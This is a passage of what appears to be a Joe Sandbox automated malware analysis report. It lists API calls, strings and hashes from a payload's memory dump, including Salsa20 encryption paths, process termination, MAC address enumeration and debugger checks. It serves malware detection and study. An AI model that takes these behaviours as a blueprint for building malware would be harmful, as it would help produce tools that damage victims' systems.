                                                                                                                            • DeleteDC.GDI32(?), ref: 004E244A
                                                                                                                            • DeleteDC.GDI32(?), ref: 004E2450
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                            • API String ID: 151064509-1805842116
                                                                                                                            • Opcode ID: 4ed62d925f17da6597ffca3e72bbf94ebeea984de2b08251d9b14925d3edd78f
                                                                                                                            • Instruction ID: a7f733731121fea7d785b09f5da35ba2d971b456535f3806dcbf7ece69462c6d
                                                                                                                            • Opcode Fuzzy Hash: 4ed62d925f17da6597ffca3e72bbf94ebeea984de2b08251d9b14925d3edd78f
                                                                                                                            • Instruction Fuzzy Hash: 1741E731904300ABD3209B759C4AF2FBFF8FF86714F00051EFA54962A2E7B598059BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0046E67F
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • _malloc.LIBCMT ref: 0046E68B
                                                                                                                            • _wprintf.LIBCMT ref: 0046E69E
                                                                                                                            • _free.LIBCMT ref: 0046E6A4
                                                                                                                              • Part of subcall function 00480BED: HeapFree.KERNEL32(00000000,00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C13
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0046E6B9
                                                                                                                            • _free.LIBCMT ref: 0046E6C5
                                                                                                                            • _malloc.LIBCMT ref: 0046E6CD
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0046E6E0
                                                                                                                            • _sprintf.LIBCMT ref: 0046E720
                                                                                                                            • _wprintf.LIBCMT ref: 0046E732
                                                                                                                            • _wprintf.LIBCMT ref: 0046E73C
                                                                                                                            • _free.LIBCMT ref: 0046E745
                                                                                                                            Strings
                                                                                                                            • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0046E71A
                                                                                                                            • Address: %s, mac: %s, xrefs: 0046E72D
                                                                                                                            • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0046E699
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                            • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                            • API String ID: 3901070236-1604013687
                                                                                                                            • Opcode ID: c120408994a542fc3aae3990ed710602f6289028875ef872b248a93bd240d085
                                                                                                                            • Instruction ID: 62ca1a70ffacf71c8f83b6ce1a21f458bd1db17afd21658e11326da53ba1915f
                                                                                                                            • Opcode Fuzzy Hash: c120408994a542fc3aae3990ed710602f6289028875ef872b248a93bd240d085
                                                                                                                            • Instruction Fuzzy Hash: BB113AB29005547BC2B173B64C06EFF3ADC8F46706F04056FFE98D5142E65C5A09A3BA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471ACA
                                                                                                                              • Part of subcall function 00471AB0: DispatchMessageW.USER32(?), ref: 00471AE0
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471AEE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00470346
                                                                                                                            • _memmove.LIBCMT ref: 00470427
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0047048E
                                                                                                                            • _memmove.LIBCMT ref: 00470514
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 273148273-0
                                                                                                                            • Opcode ID: e7ee1e09baa8b8373053189995de10bee4732a8e4dc0c615536b5d35e8c445b7
                                                                                                                            • Instruction ID: 4e43f8d237fa0cc47e4ea7f650db2158d18c991617b1f2851f8a7a8763acd288
                                                                                                                            • Opcode Fuzzy Hash: e7ee1e09baa8b8373053189995de10bee4732a8e4dc0c615536b5d35e8c445b7
                                                                                                                            • Instruction Fuzzy Hash: 9C42B070D01208DBDF24EFA4C945BDEB7F4BF04308F20856EE409A7251E779AA45CBA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3232302685-0
                                                                                                                            • Opcode ID: 7b51ece78b47c552b8adbb8f499e1a4633ab5d51fc836de29c87a2686d728397
                                                                                                                            • Instruction ID: 59b0d89b13b52cafe7865db0817cae3585a529c84d81ba7369e7c46ed2be6a09
                                                                                                                            • Opcode Fuzzy Hash: 7b51ece78b47c552b8adbb8f499e1a4633ab5d51fc836de29c87a2686d728397
                                                                                                                            • Instruction Fuzzy Hash: 7BB19F70D00208DBDF20EFA4DD45BDEB7B5BF15308F10446AE40AAB251E779AA49CF5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0047244F
                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00472469
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004724A1
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000009), ref: 004724B0
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004724B7
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 004724C1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004724CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                            • String ID: cmd.exe
                                                                                                                            • API String ID: 2696918072-723907552
                                                                                                                            • Opcode ID: 686b82e6c5e192d42608940affa233aec9b32dab4e275a7a2dcee072d640df2f
                                                                                                                            • Instruction ID: 9037aecd045fcd4b11b12cceb55fd8029414c17358ba4715e6247d686d5caf2f
                                                                                                                            • Opcode Fuzzy Hash: 686b82e6c5e192d42608940affa233aec9b32dab4e275a7a2dcee072d640df2f
                                                                                                                            • Instruction Fuzzy Hash: 7901B5355012157BE7306BA4AC8DFAF7B6CEF09715F004051FD08D2242E7B489499BB5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _wcscmp.LIBCMT ref: 004982B9
                                                                                                                            • _wcscmp.LIBCMT ref: 004982CA
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00498568,?,00000000), ref: 004982E6
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00498568,?,00000000), ref: 00498310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_wcscmp
                                                                                                                            • String ID: ACP$OCP
                                                                                                                            • API String ID: 1351282208-711371036
                                                                                                                            • Opcode ID: 1565af8796d8fca58075b66a2e283cf308e596930ccb6ba70c0922ab1c2193a5
                                                                                                                            • Instruction ID: f09221e07787fd6ed1a268f831bd9814c4459e4777eefef0877f2679f2b83973
                                                                                                                            • Opcode Fuzzy Hash: 1565af8796d8fca58075b66a2e283cf308e596930ccb6ba70c0922ab1c2193a5
                                                                                                                            • Instruction Fuzzy Hash: 2C01AD32240515AADF209F5CDC45F9A3F98AF06BA4F10807AF904DA152EF34DA41C7CC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                                            • API String ID: 0-1714976780
                                                                                                                            • Opcode ID: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                                            • Instruction ID: b6ea48031fac804e50237fea73b899a599e52b664b79a4200841d0cd80592764
                                                                                                                            • Opcode Fuzzy Hash: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                                            • Instruction Fuzzy Hash: C5314977A114960AFB78547888453BD20839397370F2EC73BD226C3AE4F87D8D81019A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • input != nullptr && output != nullptr, xrefs: 0046C095
                                                                                                                            • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0046C090
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wassert
                                                                                                                            • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                            • API String ID: 3993402318-1975116136
                                                                                                                            • Opcode ID: 679917d25044a767dc263e370465a4748786f75e15b486e877805c7e02c15bab
                                                                                                                            • Instruction ID: a55f87971629810a1491c9fb319ad9f1b3725c102d4007a170b48d151e7ca282
                                                                                                                            • Opcode Fuzzy Hash: 679917d25044a767dc263e370465a4748786f75e15b486e877805c7e02c15bab
                                                                                                                            • Instruction Fuzzy Hash: 4DC19DB5E002499FCB54CFA9C881AEEBBF0FF48300F24856AD859E7301E334AA458B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0048419D
                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00484252
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DebuggerPresent_memset
                                                                                                                            • String ID: i;H
                                                                                                                            • API String ID: 2328436684-4243722023
                                                                                                                            • Opcode ID: af219e2d4e02d6edc025ec930f8c08da150d6503fc9d49fd43e4e45dc1ac0cd4
                                                                                                                            • Instruction ID: 0e79145285b68e710057908b04055dfb15d4cd8771ec2ce8ba04f9cc06cecf7e
                                                                                                                            • Opcode Fuzzy Hash: af219e2d4e02d6edc025ec930f8c08da150d6503fc9d49fd43e4e45dc1ac0cd4
                                                                                                                            • Instruction Fuzzy Hash: 8931F77590122D9BCB21DF69D9887CDBBB8BF08310F1042EAE80CA6251E7349F858F48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 00471190
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004711A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3989222877-0
                                                                                                                            • Opcode ID: a2198c037b9d5fbd1f47509a8581bf0db8f78a9d4ce44962567a5936cf5d4b0c
                                                                                                                            • Instruction ID: 20486c5ce6693c56f7c4a4c2b96f4fc641e9dcdaf97cb66c8a1d757f8d1dc20a
                                                                                                                            • Opcode Fuzzy Hash: a2198c037b9d5fbd1f47509a8581bf0db8f78a9d4ce44962567a5936cf5d4b0c
                                                                                                                            • Instruction Fuzzy Hash: FFE0EC74F0030597EF309A799C49FAF7AA8BF18745F848516FA05E6351D62CD801C665
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 0046EA69
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0046EA79
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3989222877-0
                                                                                                                            • Opcode ID: 51ffdc68654c5d415ea20d1dc008e804feb07817255bda28a4cc8a4ffad52425
                                                                                                                            • Instruction ID: bbef1a9da0cc687f01965bcce626e60b9483a1f58b603ff5bb19955789607d97
                                                                                                                            • Opcode Fuzzy Hash: 51ffdc68654c5d415ea20d1dc008e804feb07817255bda28a4cc8a4ffad52425
                                                                                                                            • Instruction Fuzzy Hash: 00E0E2BCF0020597DF20DBB69C49B6F76E8BF15744B140429F805F2245EA2CE9058A2A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 0046EC80
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0046EC90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3989222877-0
                                                                                                                            • Opcode ID: a23f2caa626e0a6027c93bb8df86120388a71fbef345fd1b0b49a8b8ab5aecdd
                                                                                                                            • Instruction ID: d8ef9a5cc40fcb42a70e27f6dc7e448e69bc874ee7a3e4315cc3c141a4373e9f
                                                                                                                            • Opcode Fuzzy Hash: a23f2caa626e0a6027c93bb8df86120388a71fbef345fd1b0b49a8b8ab5aecdd
                                                                                                                            • Instruction Fuzzy Hash: 3AE0B6B8F0020597EF309E769D09F6F7AE86B14645B040415A901E2241E62CD8018666
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00484266,?,?,?,00000001), ref: 004929F1
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004929FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
